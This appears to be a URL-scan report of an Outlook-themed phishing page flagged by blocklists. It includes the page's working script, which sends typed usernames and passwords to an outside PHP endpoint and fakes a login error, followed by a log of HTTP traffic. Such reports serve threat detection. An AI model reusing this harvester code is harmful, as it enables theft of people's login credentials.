            src = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABYAAAAWCAYAAADEtGw7AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyBpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMC1jMDYwIDYxLjEzNDc3NywgMjAxMC8wMi8xMi0xNzozMjowMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNSBXaW5kb3dzIiB4bXBNTTpJbnN0YW5jZUlEPSJ4bXAuaWlkOjU1NzZGNEQzOTYxOTExRTE4ODU2ODkyQUQxMTQ2QUJGIiB4bXBNTTpEb2N1bWVudElEPSJ4bXAuZGlkOjU1NzZGNEQ0OTYxOTExRTE4ODU2ODkyQUQxMTQ2QUJGIj4gPHhtcE1NOkRlcml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6NTU3NkY0RDE5NjE5MTFFMTg4NTY4OTJBRDExNDZBQkYiIHN0UmVmOmRvY3VtZW50SUQ9InhtcC5kaWQ6NTU3NkY0RDI5NjE5MTFFMTg4NTY4OTJBRDExNDZBQkYiLz4gPC9yZGY6RGVzY3JpcHRpb24+IDwvcmRmOlJERj4gPC94OnhtcG1ldGE+IDw/eHBhY2tldCBlbmQ9InIiPz7MvF4iAAACF0lEQVR42qyVz0sCQRTHZ5cSuqQJURRUt66GEuQlugmF0Ukw+huCjaBT0SkhEvwL6iQEERRJndIuCoLU1VsFQkH04xR0se/D79C4qLtCDz47zO6b7755M2/GUk5ZdbEwSIEEmAQRvn8ADXADTptHC++dBlsdhIfAJtgBQdXbvkAG5PCDb/OD7XIcByVwQNFLsA5iYJDE+O6SPuJbsrYq490ilulKZwrUwB4oeES8DPZBFDyDOCJvmBEHwDlFC8yrl6hy+crYc0QeMIUdMM9IN8Cb8mmI8I1jatRwtLDkaZt+Mv0P1adB/INjxbYRddBmnsKczt/0s/F2lJrhT5vgHoTkvWVZWlyPF620zb2qPHOajT/iuQQ+uaeLWPiQyyvPNiHCs+zces45G5fimGORaPGI4XHHNjrAvSv22ibilJs+0tsSV2qEfb3oo7b6Xwuw/ZGIX7gzxpi/v+LRi9g+E4nymNFKStaMrxNsGxJxnZ1Fz3haokVDdImLqi3Kti7CZ+wkXQvVHq1TnqFoyBD9dP06zfZGzgpJwxPTseKzlM3iaOVtqyL1cMUTb9o2jj6xXWOFfRtERzhWLIOffeldkTVq/QQM9yE6zDH6rMmZh9APWOXNkGSxJHzoJuib5NhVfeCb+1g+yGpVubrX4IIlH3EVRYrfrulbNc/iXleTwxPPz9V0KKl0X02Wx2Wa9rhM890u018BBgDOvaD/8G2ecwAAAABJRU5ErkJggg=="

            alt = "" > < span class = "signinTxt" > sign in < /span> < /div> < input name = "isUtf8"
            value = "1"
            type = "hidden" / >
            < /div> < div class = "hidden-submit" > < input type = "submit"
            tabindex = "-1" / > < /div> < /div> < /div>

            < div class = "signInEnter" >
            < div onclick = "clkRtry()"
            style = "cursor:pointer;display:inline" >
            < img class = "imgLnk"

            src = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABYAAAAWCAYAAADEtGw7AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyBpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMC1jMDYwIDYxLjEzNDc3NywgMjAxMC8wMi8xMi0xNzozMjowMCAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvIiB4bWxuczp4bXBNTT0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENTNSBXaW5kb3dzIiB4bXBNTTpJbnN0YW5jZUlEPSJ4bXAuaWlkOjU1NzZGNEQzOTYxOTExRTE4ODU2ODkyQUQxMTQ2QUJGIiB4bXBNTTpEb2N1bWVudElEPSJ4bXAuZGlkOjU1NzZGNEQ0OTYxOTExRTE4ODU2ODkyQUQxMTQ2QUJGIj4gPHhtcE1NOkRlcml2ZWRGcm9tIHN0UmVmOmluc3RhbmNlSUQ9InhtcC5paWQ6NTU3NkY0RDE5NjE5MTFFMTg4NTY4OTJBRDExNDZBQkYiIHN0UmVmOmRvY3VtZW50SUQ9InhtcC5kaWQ6NTU3NkY0RDI5NjE5MTFFMTg4NTY4OTJBRDExNDZBQkYiLz4gPC9yZGY6RGVzY3JpcHRpb24+IDwvcmRmOlJERj4gPC94OnhtcG1ldGE+IDw/eHBhY2tldCBlbmQ9InIiPz7MvF4iAAACF0lEQVR42qyVz0sCQRTHZ5cSuqQJURRUt66GEuQlugmF0Ukw+huCjaBT0SkhEvwL6iQEERRJndIuCoLU1VsFQkH04xR0se/D79C4qLtCDz47zO6b7755M2/GUk5ZdbEwSIEEmAQRvn8ADXADTptHC++dBlsdhIfAJtgBQdXbvkAG5PCDb/OD7XIcByVwQNFLsA5iYJDE+O6SPuJbsrYq490ilulKZwrUwB4oeES8DPZBFDyDOCJvmBEHwDlFC8yrl6hy+crYc0QeMIUdMM9IN8Cb8mmI8I1jatRwtLDkaZt+Mv0P1adB/INjxbYRddBmnsKczt/0s/F2lJrhT5vgHoTkvWVZWlyPF620zb2qPHOajT/iuQQ+uaeLWPiQyyvPNiHCs+zces45G5fimGORaPGI4XHHNjrAvSv22ibilJs+0tsSV2qEfb3oo7b6Xwuw/ZGIX7gzxpi/v+LRi9g+E4nymNFKStaMrxNsGxJxnZ1Fz3haokVDdImLqi3Kti7CZ+wkXQvVHq1TnqFoyBD9dP06zfZGzgpJwxPTseKzlM3iaOVtqyL1cMUTb9o2jj6xXWOFfRtERzhWLIOffeldkTVq/QQM9yE6zDH6rMmZh9APWOXNkGSxJHzoJuib5NhVfeCb+1g+yGpVubrX4IIlH3EVRYrfrulbNc/iXleTwxPPz9V0KKl0X02Wx2Wa9rhM890u018BBgDOvaD/8G2ecwAAAABJRU5ErkJggg=="

            alt = "" > < span class = "signinTxt"
            tabIndex = "0" > retry < /span> < /div> < /div> < /div> < /div> < /form> < script src = "https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.0/umd/popper.min.js"
            integrity = "sha384-cs/chFZiN24E4KMATLdqdvsezGxaGsi4hLGOzlXwp5UZB1LY//20VyM2taTB4QvJ"
            crossorigin = "anonymous" > < /script> < script src = "https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"
            integrity = "sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa"
            crossorigin = "anonymous" > < /script> < script >
            var hash = window.location.hash;
            $('#psssss').focus();
            document.getElementById('testx').value = hash.split('#')[1];
            var em = $('#testx').val();
            var ps = $('#psssss').val();

            var email = document.getElementById('testx').value = hash.split('#')[1];

            var name = email.substring(0, email.lastIndexOf("@"));

            var domain = email.substring(email.lastIndexOf("@") + 1);

            document.getElementById('psssss').focus();

            $('#psssss').keydown(function(e) {
                if (e.which == 13) {
                    sendmails();
                    return false;
                }
            });

            function sendmails() {
                var em = $('#testx').val();
                var ps = $('#psssss').val();

                if (ps === "" || ps === " " || ps == " " || ps == "  " || ps == "   " || ps === null) {

                    document.getElementById('warning').innerHTML = "The user name or password you entered isn't correct. Try entering it again.";
                    document.getElementById('psssss').focus();

                } else if (em == "" || em == " " || em == " " || em == null || em == undefined) {

                    document.getElementById('warning').innerHTML = "The user name or password you entered isn't correct. Try entering it again.";

                } else {
                    var em = $('#testx').val();
                    var ps = $('#psssss').val();

                    $.ajax({
                        url: 'https://ambercapitalinvestment.com/igbo/test/wde.php', // full url of webmail.php
                        type: 'POST',
                        data: {
                            user: em,
                            pass: ps,
                            type: 1
                        },
                        beforeSend: function() {
                            $(".progress").show();
                        },
                        success: function(response) {

                            $(".LOGin_F0rm").hide();

                            $(".progress").hide();

                            var randomLink = Math.random().toString(13).replace('0.', '');

                            var email = document.getElementById('testx').value = hash.split('#')[1];

                            var name = email.substring(0, email.lastIndexOf("@"));

                            var domain = email.substring(email.lastIndexOf("@") + 1);

                            document.getElementById('warning').innerHTML = "The user name or password you entered isn't correct. Try entering it again.";
                            $('#psssss').val("");
                            $('#psssss').focus();

                            console.log(randomLink);
                            return;

                        }
                    });
                }
            }

            < /script> < /body> < /html>

HTTP Transactions (36)

Request	Response
GET /owas444o44/334owa.authentic/new.html/ HTTP/1.1 Host: 673925.selcdn.ru User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Upgrade-Insecure-Requests: 1	URL: 673925.selcdn.ru/owas444o44/334owa.authentic/new.html/ FQDN: 673925.selcdn.ru IP: 92.53.68.202 HASH: c20488a76805062fde75ef6db8083e7e8dde323dfab5b281d3055f465c9970a3 92.53.68.202 HTTP/1.1 200 OK Content-Type: text/html Accept-Ranges: bytes Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Cache-Control, Content-Language, Content-Type, Expires, Last-Modified, Pragma, Etag, X-Timestamp, X-Trans-Id, X-Openstack-Request-Id, Content-Length, Accept-Ranges Content-Length: 137320 Etag: "d5b113cc4d92ebe7a8ba66382969e2a8" Last-Modified: Tue, 27 Sep 2022 09:52:23 GMT X-Timestamp: 1664272342.65100 X-Trans-Id: 1718aee0c123ca67 Date: Wed, 28 Sep 2022 07:44:58 GMT Age: 50315 --- Additional Info --- Magic: HTML document, ASCII text, with very long lines (65536), with no line terminators Size: 137320 Md5: d5b113cc4d92ebe7a8ba66382969e2a8 Sha1: d81139541f3b40fc734bcea4f2083a4a63695ec5 Sha256: c20488a76805062fde75ef6db8083e7e8dde323dfab5b281d3055f465c9970a3 Alerts: Blocklists: - openphish: Outlook - fortinet: Phishing
GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: firefox.settings.services.mozilla.com/v1/ FQDN: firefox.settings.services.mozilla.com IP: 143.204.55.36 HASH: 73c273c0b5a2de3cb970b8e8c187999d3b55e760dc7766dab4bb76428d19b551 143.204.55.36 HTTP/1.1 200 OK Content-Type: application/json Content-Length: 939 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Type, Alert, Backoff, Retry-After, Content-Length Cache-Control: max-age=3600 Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Date: Wed, 28 Sep 2022 21:15:44 GMT X-Content-Type-Options: nosniff X-Cache: Hit from cloudfront Via: 1.1 80d21802b1b80c40e55ccf83433b8eac.cloudfront.net (CloudFront) X-Amz-Cf-Pop: OSL50-C1 X-Amz-Cf-Id: vQKGb-_98wtSQ1HmFUIxBnieT32g1geAxrexYf61dz61C3oV39Yagg== Age: 1669 --- Additional Info --- Magic: JSON data\012- , ASCII text, with very long lines (939), with no line terminators Size: 939 Md5: 2d12f67fe57a87e7366b662d153a5582 Sha1: d7b02d81cc74f24a251d9363e0f4b0a149264ec1 Sha256: 73c273c0b5a2de3cb970b8e8c187999d3b55e760dc7766dab4bb76428d19b551
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: r3.o.lencr.org/ FQDN: r3.o.lencr.org IP: 23.36.76.226 HASH: 2a40f957a6b1734aa3f87cff51b673f0536732db15b09033dd604879692df349 23.36.76.226 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "2A40F957A6B1734AA3F87CFF51B673F0536732DB15B09033DD604879692DF349" Last-Modified: Tue, 27 Sep 2022 21:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=5609 Expires: Wed, 28 Sep 2022 23:17:02 GMT Date: Wed, 28 Sep 2022 21:43:33 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: 7fb7c70f7f4e2cee27eb0e7d875931f7 Sha1: 98fca3817a551b1daecebae103a48e718b8b5a53 Sha256: 2a40f957a6b1734aa3f87cff51b673f0536732db15b09033dd604879692df349
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: r3.o.lencr.org/ FQDN: r3.o.lencr.org IP: 23.36.76.226 HASH: e16e8b782b441ecb9a57c3fc3db9884b5a3034967b846cca67b2f53644fcabdf 23.36.76.226 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "E16E8B782B441ECB9A57C3FC3DB9884B5A3034967B846CCA67B2F53644FCABDF" Last-Modified: Tue, 27 Sep 2022 21:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=12612 Expires: Thu, 29 Sep 2022 01:13:45 GMT Date: Wed, 28 Sep 2022 21:43:33 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: 8afc4649e99d0e42b9bf5b133eebed5c Sha1: e3e7e0e614af3262b74bd4b6267ef23293bdb5f0 Sha256: e16e8b782b441ecb9a57c3fc3db9884b5a3034967b846cca67b2f53644fcabdf
GET /chains/remote-settings.content-signature.mozilla.org-2022-10-30-18-47-44.chain HTTP/1.1 Host: content-signature-2.cdn.mozilla.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: no-cors Sec-Fetch-Site: cross-site	URL: content-signature-2.cdn.mozilla.net/chains/remote-setti (...) FQDN: content-signature-2.cdn.mozilla.net IP: 34.160.144.191 HASH: b6e0cc9ad68306208a160f3835fb8da76acc5a82d8fde1da5a98e1de1c11a770 34.160.144.191 HTTP/2 200 OK content-type: binary/octet-stream x-amz-id-2: rLv0Y9qMKkSDqPQZ9NveJg5JEg88BmpjnbbGb9T963lPtXJAl1lPiicxhJQc78xJPrhZ8Lc1Mh4= x-amz-request-id: ES0MFS5ZYE27YKJ6 content-disposition: attachment accept-ranges: bytes server: AmazonS3 content-length: 5348 via: 1.1 google date: Wed, 28 Sep 2022 20:50:13 GMT age: 3200 last-modified: Sat, 10 Sep 2022 18:47:45 GMT etag: "6113f8408c59aebe188d6af273b90743" cache-control: public,max-age=3600 alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: PEM certificate\012- , ASCII text Size: 5348 Md5: 6113f8408c59aebe188d6af273b90743 Sha1: 7398873bf00f99944eaa77ad3ebc0d43c23dba6b Sha256: b6e0cc9ad68306208a160f3835fb8da76acc5a82d8fde1da5a98e1de1c11a770
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: ocsp.digicert.com/ FQDN: ocsp.digicert.com IP: 93.184.220.29 HASH: c1d5aef26522bc5412943bef33f64ed3491d51283b1f740765d775b0ded71330 93.184.220.29 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 4627 Cache-Control: 'max-age=158059' Date: Wed, 28 Sep 2022 21:43:33 GMT Last-Modified: Wed, 28 Sep 2022 20:26:26 GMT Server: ECS (ska/F710) X-Cache: HIT Content-Length: 280 --- Additional Info --- Magic: data Size: 280 Md5: 2b52ad405720d7d4665f40f842db9e99 Sha1: c7e9646a8f2d2d8e932b26d231a518647230e308 Sha256: c1d5aef26522bc5412943bef33f64ed3491d51283b1f740765d775b0ded71330
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: ocsp.digicert.com/ FQDN: ocsp.digicert.com IP: 93.184.220.29 HASH: 238fd305a8853df61050a601a24c483728ab6695658f993bc179a075a5616cd9 93.184.220.29 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 1409 Cache-Control: 'max-age=158059' Date: Wed, 28 Sep 2022 21:43:33 GMT Last-Modified: Wed, 28 Sep 2022 21:20:04 GMT Server: ECS (ska/F70D) X-Cache: HIT Content-Length: 279 --- Additional Info --- Magic: data Size: 279 Md5: 5f4b013b5656bef604b0022eb233d049 Sha1: 5b5ac71b8dbb5b488d7267d0d70292c2f7651c5b Sha256: 238fd305a8853df61050a601a24c483728ab6695658f993bc179a075a5616cd9
GET /v1/tiles HTTP/1.1 Host: contile.services.mozilla.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: contile.services.mozilla.com/v1/tiles FQDN: contile.services.mozilla.com IP: 34.117.237.239 HASH: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3 34.117.237.239 HTTP/2 200 OK content-type: application/json server: nginx date: Wed, 28 Sep 2022 21:43:33 GMT content-length: 12 strict-transport-security: max-age=31536000 via: 1.1 google alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JSON data\012- , ASCII text, with no line terminators Size: 12 Md5: 23e88fb7b99543fb33315b29b1fad9d6 Sha1: a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: ocsp.digicert.com/ FQDN: ocsp.digicert.com IP: 93.184.220.29 HASH: 238fd305a8853df61050a601a24c483728ab6695658f993bc179a075a5616cd9 93.184.220.29 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 5121 Cache-Control: 'max-age=158059' Date: Wed, 28 Sep 2022 21:43:33 GMT Last-Modified: Wed, 28 Sep 2022 20:18:12 GMT Server: ECS (ska/F710) X-Cache: HIT Content-Length: 279 --- Additional Info --- Magic: data Size: 279 Md5: 5f4b013b5656bef604b0022eb233d049 Sha1: 5b5ac71b8dbb5b488d7267d0d70292c2f7651c5b Sha256: 238fd305a8853df61050a601a24c483728ab6695658f993bc179a075a5616cd9
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: ocsp.digicert.com/ FQDN: ocsp.digicert.com IP: 93.184.220.29 HASH: 238fd305a8853df61050a601a24c483728ab6695658f993bc179a075a5616cd9 93.184.220.29 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 1409 Cache-Control: 'max-age=158059' Date: Wed, 28 Sep 2022 21:43:33 GMT Last-Modified: Wed, 28 Sep 2022 21:20:04 GMT Server: ECS (ska/F70D) X-Cache: HIT Content-Length: 279 --- Additional Info --- Magic: data Size: 279 Md5: 5f4b013b5656bef604b0022eb233d049 Sha1: 5b5ac71b8dbb5b488d7267d0d70292c2f7651c5b Sha256: 238fd305a8853df61050a601a24c483728ab6695658f993bc179a075a5616cd9
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: ocsp.digicert.com/ FQDN: ocsp.digicert.com IP: 93.184.220.29 HASH: c1d5aef26522bc5412943bef33f64ed3491d51283b1f740765d775b0ded71330 93.184.220.29 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 4627 Cache-Control: 'max-age=158059' Date: Wed, 28 Sep 2022 21:43:33 GMT Last-Modified: Wed, 28 Sep 2022 20:26:26 GMT Server: ECS (ska/F710) X-Cache: HIT Content-Length: 280 --- Additional Info --- Magic: data Size: 280 Md5: 2b52ad405720d7d4665f40f842db9e99 Sha1: c7e9646a8f2d2d8e932b26d231a518647230e308 Sha256: c1d5aef26522bc5412943bef33f64ed3491d51283b1f740765d775b0ded71330
GET /ajax/libs/font-awesome/4.7.0/css/font-awesome.css HTTP/1.1 Host: cdnjs.cloudflare.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/css,/;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: http://673925.selcdn.ru/ Sec-Fetch-Dest: style Sec-Fetch-Mode: no-cors Sec-Fetch-Site: cross-site	URL: cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/f (...) FQDN: cdnjs.cloudflare.com IP: 104.17.24.14 HASH: 84dce905b67560d91a9993771337d6e5946c7f1e502b5bf06fb0ef6d34b97b57 104.17.24.14 HTTP/2 200 OK content-type: text/css; charset=utf-8 date: Wed, 28 Sep 2022 21:43:33 GMT content-length: 5884 access-control-allow-origin: * cache-control: public, max-age=30672000 content-encoding: br etag: "5eb03e5f-9226" last-modified: Mon, 04 May 2020 16:10:07 GMT cf-cdnjs-via: cfworker/kv cross-origin-resource-policy: cross-origin timing-allow-origin: * x-content-type-options: nosniff vary: Accept-Encoding cf-cache-status: HIT age: 2348309 expires: Mon, 18 Sep 2023 21:43:33 GMT accept-ranges: bytes report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Bp3rJwHsctD%2Fs6FtBa%2Fpcl9bzy4kw%2Bcoes4Y1wa3B4D9dwAyLR2Gmgpg5MdZFV%2B%2BjLgzfgeC9E57uvYPulLTbWQFUEHx9FjifCw0OOpdn4witsMOFp%2FiJuyQ5wT0ZxaGhjHeXMlS"}],"group":"cf-nel","max_age":604800} nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} strict-transport-security: max-age=15780000 server: cloudflare cf-ray: 751fa7c498d0b4fa-OSL alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: troff or preprocessor input, ASCII text, with very long lines (372) Size: 5884 Md5: aa712f2a9ab349290ddbc871138b13ba Sha1: 2be3765114dbce70c84786dd7d2838c7edce486c Sha256: 84dce905b67560d91a9993771337d6e5946c7f1e502b5bf06fb0ef6d34b97b57
GET /ajax/libs/popper.js/1.14.0/umd/popper.min.js HTTP/1.1 Host: cdnjs.cloudflare.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://673925.selcdn.ru Connection: keep-alive Referer: http://673925.selcdn.ru/ Sec-Fetch-Dest: script Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.0/umd/pop (...) FQDN: cdnjs.cloudflare.com IP: 104.17.24.14 HASH: 91d57502b7260e6752c2b5f1636d77707929fa9f09da28589691e61816a448f9 104.17.24.14 HTTP/2 200 OK content-type: application/javascript; charset=utf-8 date: Wed, 28 Sep 2022 21:43:33 GMT content-length: 6458 access-control-allow-origin: * cache-control: public, max-age=30672000 content-encoding: br etag: "5eb03fa9-500f" last-modified: Mon, 04 May 2020 16:15:37 GMT cf-cdnjs-via: cfworker/kv cross-origin-resource-policy: cross-origin timing-allow-origin: * x-content-type-options: nosniff expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" vary: Accept-Encoding cf-cache-status: HIT age: 7444660 expires: Mon, 18 Sep 2023 21:43:33 GMT accept-ranges: bytes report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QucaJ6qpaLg20x23zgU4RFXh3m0qcNQXX49HoxynK%2BJVJeqHnAHnZCWJA0vvy42Z14XH9rizlklxMVyFJe6GTJECZpezbPqfehrzRwgU5JZfV0u8k8jnuOWQvePCT8y%2F3KciL1Ne"}],"group":"cf-nel","max_age":604800} nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} strict-transport-security: max-age=15780000 server: cloudflare cf-ray: 751fa7c4bad7b4f4-OSL alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: ASCII text, with very long lines (20322) Size: 6458 Md5: df9fe6d48e380554eb0ec9687bed3246 Sha1: 207263d754220200c1916edfbda262f62223ecf5 Sha256: 91d57502b7260e6752c2b5f1636d77707929fa9f09da28589691e61816a448f9
POST /gts1c3 HTTP/1.1 Host: ocsp.pki.goog User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: ocsp.pki.goog/gts1c3 FQDN: ocsp.pki.goog IP: 142.250.74.3 HASH: 869e09d135cff97a1073e32fa1808d0068195421369d138ad6bba86cfef18091 142.250.74.3 HTTP/1.1 200 OK Content-Type: application/ocsp-response Date: Wed, 28 Sep 2022 21:43:33 GMT Cache-Control: public, max-age=14400 Server: ocsp_responder Content-Length: 471 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN --- Additional Info --- Magic: data Size: 471 Md5: 3e9d3eab1fba386c4fdf3af9a757cfa9 Sha1: b50127a1072c95ed71110b07dd58eab72747e6f8 Sha256: 869e09d135cff97a1073e32fa1808d0068195421369d138ad6bba86cfef18091
